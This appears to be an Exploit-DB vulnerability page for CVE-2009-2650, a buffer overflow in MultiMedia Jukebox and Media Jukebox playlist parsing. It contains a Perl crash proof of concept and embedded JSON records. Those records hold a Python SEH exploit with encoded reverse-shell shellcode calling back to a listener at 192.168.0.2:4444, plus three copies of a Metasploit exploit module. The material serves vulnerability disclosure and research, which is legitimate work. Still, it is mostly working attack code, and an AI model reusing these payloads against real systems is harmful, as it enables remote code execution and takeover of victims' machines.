ID EDB-ID:9173
Type exploitdb
Reporter hack4love
Modified 2009-07-16T00:00:00
Description
MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC. CVE-2009-2650. Dos exploit for windows platform
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-16]
{"id": "EDB-ID:9173", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MultiMedia Jukebox 4.0 Build 020124 - .pst / .m3u Heap Overflow PoC", "description": "MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC. CVE-2009-2650. Dos exploit for windows platform", "published": "2009-07-16T00:00:00", "modified": "2009-07-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9173/", "reporter": "hack4love", "references": [], "cvelist": ["CVE-2009-2650"], "lastseen": "2016-02-01T10:02:09", "viewCount": 7, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2016-02-01T10:02:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2650"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84549"]}, {"type": "exploitdb", "idList": ["EDB-ID:10744", "EDB-ID:16620", "EDB-ID:9551"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MEDIAJUKEBOX"]}], "modified": "2016-02-01T10:02:09", "rev": 2}, "vulnersScore": 7.1}, "sourceHref": "https://www.exploit-db.com/download/9173/", "sourceData": "#!/usr/bin/perl\n# Found By :: HACK4LOVE\n# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC\n# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html\n########################################################################################\n# special thanks for sec-code.com and sniper code\n########################################################################################\nmy $crash=\"\\x41\" x 5000;\nopen(myfile,'>>hack4love.m3u');\nprint myfile $crash;\n########################################################################################\n\n# milw0rm.com [2009-07-16]\n", "osvdbidlist": ["55924"]}
{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "Heap-based buffer overflow in Sorcerer Software MultiMedia Jukebox 4.0 Build 020124 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .m3u or possibly (2) .pst file.", "edition": 3, "cvss3": {}, "published": "2009-07-30T19:30:00", "title": "CVE-2009-2650", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2650"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:sorcerersoftware:multimedia_jukebox:4.0"], "id": "CVE-2009-2650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2650", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sorcerersoftware:multimedia_jukebox:4.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T10:50:55", "description": "Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH). CVE-2009-2650. Local exploit for windows platform", "published": "2009-08-31T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8 - .pls Universal Local Buffer Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-08-31T00:00:00", "id": "EDB-ID:9551", "href": "https://www.exploit-db.com/exploits/9551/", "sourceData": "#!/usr/bin/python\n#\n# ######################################################################\n#\n# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)\n# Author: mr_me\n# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html\n# Note: we needed a header to trigger this one ;) \n# Tested on: Wind0ws XP and Vist@\n# Greetz: offensive-security, I tried harder :) \n# \n# ######################################################################\n#\n# msf exploit(handler) > exploit\n#\n# [*] Handler binding to LHOST 0.0.0.0\n# [*] Started reverse handler\n# [*] Starting the payload handler...\n# [*] Sending stage (474 bytes)\n# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)\n#\n# Microsoft Windows XP [Version 5.1.2600]\n# (C) Copyright 1985-2001 Microsoft Corp.\n#\n# C:\\Program Files> \n#\n\ndef banner():\n\tprint \"\\n|-------------------------------------------------------------|\" \n\tprint \"| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |\" \n\tprint \"| by MrMe 09/09 |\"\n\tprint \"|-------------------------------------------------------------|\\n\"\n\n# windows/shell/reverse_tcp - 617 bytes (stage 1)\n# http://www.metasploit.com\n# Encoder: x86/alpha_mixed\n# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444\n\nsc = (\"\\xda\\xc8\\xd9\\x74\\x24\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4d\\x38\\x50\\x56\\x45\\x50\\x45\\x50\\x43\\x30\\x51\\x43\\x50\\x55\"\n\"\\x46\\x36\\x50\\x57\\x4c\\x4b\\x42\\x4c\\x46\\x44\\x45\\x48\\x4c\\x4b\\x47\"\n\"\\x35\\x47\\x4c\\x4c\\x4b\\x50\\x54\\x44\\x45\\x42\\x58\\x45\\x51\\x4b\\x5a\"\n\"\\x4c\\x4b\\x51\\x5a\\x44\\x58\\x4c\\x4b\\x50\\x5a\\x47\\x50\\x43\\x31\\x4a\"\n\"\\x4b\\x4b\\x53\\x46\\x52\\x47\\x39\\x4c\\x4b\\x47\\x44\\x4c\\x4b\\x43\\x31\"\n\"\\x4a\\x4e\\x46\\x51\\x4b\\x4f\\x4b\\x4c\\x50\\x31\\x49\\x50\\x4e\\x4c\\x46\"\n\"\\x58\\x4d\\x30\\x42\\x54\\x44\\x47\\x49\\x51\\x48\\x4f\\x44\\x4d\\x43\\x31\"\n\"\\x49\\x57\\x4a\\x4b\\x4c\\x32\\x47\\x4b\\x43\\x4c\\x46\\x44\\x45\\x44\\x42\"\n\"\\x55\\x4b\\x51\\x4c\\x4b\\x51\\x4a\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\"\n\"\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x50\\x5a\\x45\\x4c\\x45\\x51\\x4a\"\n\"\\x4b\\x4c\\x4b\\x45\\x54\\x4c\\x4b\\x43\\x31\\x4b\\x58\\x4a\\x4b\\x45\\x52\"\n\"\\x50\\x31\\x49\\x50\\x51\\x4f\\x51\\x4e\\x51\\x4d\\x51\\x4b\\x49\\x52\\x44\"\n\"\\x48\\x45\\x50\\x51\\x4e\\x43\\x5a\\x46\\x50\\x50\\x59\\x45\\x34\\x4c\\x4b\"\n\"\\x45\\x49\\x4c\\x4b\\x51\\x4b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x45\\x4c\\x4c\"\n\"\\x4b\\x45\\x4b\\x4c\\x4b\\x51\\x4b\\x45\\x58\\x51\\x43\\x43\\x58\\x4c\\x4e\"\n\"\\x50\\x4e\\x44\\x4e\\x4a\\x4c\\x4b\\x4f\\x48\\x56\\x4c\\x49\\x48\\x47\\x51\"\n\"\\x43\\x45\\x38\\x51\\x44\\x49\\x5a\\x4e\\x4f\\x4c\\x51\\x4b\\x4f\\x49\\x46\"\n\"\\x4b\\x31\\x4a\\x4c\\x43\\x30\\x45\\x51\\x45\\x50\\x43\\x30\\x50\\x50\\x51\"\n\"\\x47\\x51\\x46\\x51\\x43\\x4b\\x39\\x4b\\x55\\x4a\\x48\\x45\\x4f\\x43\\x30\"\n\"\\x45\\x50\\x43\\x30\\x4a\\x30\\x43\\x31\\x43\\x30\\x43\\x30\\x4e\\x56\\x42\"\n\"\\x39\\x44\\x58\\x4b\\x57\\x4e\\x44\\x44\\x59\\x42\\x50\\x4b\\x59\\x4a\\x4c\"\n\"\\x4c\\x39\\x4e\\x4a\\x45\\x30\\x4e\\x39\\x45\\x59\\x4b\\x45\\x4e\\x4d\\x48\"\n\"\\x4b\\x4a\\x4d\\x4b\\x4c\\x47\\x4b\\x46\\x37\\x50\\x53\\x50\\x32\\x51\\x4f\"\n\"\\x46\\x53\\x46\\x52\\x43\\x30\\x51\\x4b\\x4c\\x4d\\x50\\x4b\\x42\\x38\\x46\"\n\"\\x31\\x4b\\x4f\\x49\\x47\\x4c\\x49\\x49\\x4f\\x4c\\x49\\x49\\x53\\x4c\\x4d\"\n\"\\x43\\x45\\x42\\x34\\x42\\x4a\\x45\\x55\\x50\\x59\\x50\\x51\\x46\\x33\\x4b\"\n\"\\x4f\\x50\\x34\\x4c\\x4f\\x4b\\x4f\\x51\\x45\\x43\\x34\\x51\\x49\\x4d\\x59\"\n\"\\x44\\x44\\x4c\\x4e\\x4b\\x52\\x4c\\x32\\x46\\x4b\\x51\\x37\\x46\\x34\\x4b\"\n\"\\x4f\\x47\\x47\\x4b\\x4f\\x51\\x45\\x51\\x38\\x50\\x31\\x49\\x50\\x46\\x30\"\n\"\\x46\\x30\\x46\\x30\\x50\\x50\\x51\\x50\\x46\\x30\\x47\\x30\\x50\\x50\\x4b\"\n\"\\x4f\\x51\\x45\\x47\\x54\\x4d\\x59\\x48\\x47\\x43\\x58\\x49\\x50\\x49\\x38\"\n\"\\x45\\x50\\x43\\x32\\x42\\x48\\x43\\x32\\x43\\x30\\x42\\x31\\x51\\x4c\\x4d\"\n\"\\x59\\x4b\\x51\\x43\\x5a\\x44\\x50\\x46\\x31\\x51\\x47\\x4b\\x4f\\x51\\x45\"\n\"\\x51\\x30\\x42\\x4a\\x51\\x50\\x51\\x4e\\x46\\x36\\x49\\x51\\x4a\\x46\\x44\"\n\"\\x46\\x46\\x36\\x49\\x51\\x4d\\x36\\x45\\x58\\x50\\x56\\x43\\x5a\\x43\\x30\"\n\"\\x4b\\x4f\\x46\\x35\\x44\\x4c\\x4b\\x39\\x48\\x43\\x43\\x5a\\x43\\x30\\x50\"\n\"\\x56\\x46\\x33\\x51\\x47\\x4b\\x4f\\x51\\x45\\x42\\x38\\x4b\\x4f\\x4e\\x33\"\n\"\\x41\\x41\")\n\nheader = (\"[playlist]\\n\");\nheader += (\"NumberOfEntries=3\\n\\n\");\nheader += (\"File1=http://\");\t# give a dummy header to trick the app\ncrash = (\"\\x41\" * 262);\t\t# overwrite the buffer at 262 bytes\njmp = (\"\\xeb\\x06\\x90\\x90\"); \t# short jump over SEH handler\nseh = (\"\\x6f\\x29\\x01\\x10\"); \t# universal p/p/r from wnaspi32.dll\nnops = (\"\\x90\" * 5);\t\t# nop sled for easy landing\njunk = (\"\\xCC\" * 500);\t\t# gotta make the size seem real ;) \n\nbuff = header + crash + jmp + seh + nops + sc + junk\nbanner()\n\ntry:\n\tfile = open('mr_mes-wicked_miX.pl','w');\n\tfile.write(buff);\n\tfile.close();\n\tprint \"[+] File created successfully: mr_mes-wicked_miX.pls\\n\";\nexcept:\n\tprint \"[-] Error cant write file to system\\n\";\n\n# milw0rm.com [2009-08-31]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9551/"}, {"lastseen": "2016-02-02T06:06:08", "description": "Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH). CVE-2009-2650. Local exploit for windows platform", "published": "2011-01-08T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8.0.400 - Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2011-01-08T00:00:00", "id": "EDB-ID:16620", "href": "https://www.exploit-db.com/exploits/16620/", "sourceData": "##\r\n# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Media Jukebox 8.0.400\r\n\t\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Ron Henry <rlh[at]ciphermonk.net>',\r\n\t\t\t\t\t'dijital1',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11516 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '55924' ],\r\n\t\t\t\t\t[ 'CVE', '2009-2650']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 3000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t\t[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'July 1 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tsploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\r\n\t\tsploit << rand_text_alphanumeric(262)\r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16620/"}, {"lastseen": "2016-02-01T13:06:25", "description": "Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta). CVE-2009-2650. Local exploit for windows platform", "published": "2009-12-27T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8.0.400 seh Buffer Overflow Exploit meta", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-12-27T00:00:00", "id": "EDB-ID:10744", "href": "https://www.exploit-db.com/exploits/10744/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',\r\n\t\t\t'Description' => %q{ \r\n\t\t\t\tThis module exploits a stack overflow in Media Jukebox 8.0.400\r\n\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\r\n\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Ron Henry - <rlh [at] ciphermonk.net>',\r\n\t\t\t\t\t'dijital1',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 7828 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 3000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t\t[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n sploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\r\n\t\tsploit << rand_text_alphanumeric(262) \r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10744/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:17", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84549", "href": "https://packetstormsecurity.com/files/84549/Media-Jukebox-8.0.400-Buffer-Overflow-Exploit-SEH.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', \n'Description' => %q{ \nThis module exploits a stack overflow in Media Jukebox 8.0.400 \nBy creating a specially crafted m3u or pls file, an an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Ron Henry <rlh[at]ciphermonk.net>', \n'dijital1', \n], \n'Version' => '$Revision: 8038 $', \n'References' => \n[ \n[ 'OSVDB', '55924' ], \n[ 'CVE', '2009-2650'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 3000, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll \n[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll \n], \n'Privileged' => false, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']), \n], self.class) \nend \n \n \ndef exploit \nsploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger \nsploit << rand_text_alphanumeric(262) \nsploit << generate_seh_payload(target.ret) \nsploit << payload.encoded \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84549/mediajukebox.rb.txt"}], "metasploit": [{"lastseen": "2020-07-20T11:05:20", "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.\n", "published": "2009-12-28T04:36:25", "type": "metasploit", "title": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MEDIAJUKEBOX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ron Henry <rlh[at]ciphermonk.net>',\n 'dijital1',\n ],\n 'References' =>\n [\n [ 'OSVDB', '55924' ],\n [ 'CVE', '2009-2650']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 3000,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\n [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 1 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\n ])\n end\n\n\n def exploit\n sploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\n sploit << rand_text_alphanumeric(262)\n sploit << generate_seh_payload(target.ret)\n sploit << payload.encoded\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/mediajukebox.rb"}]}
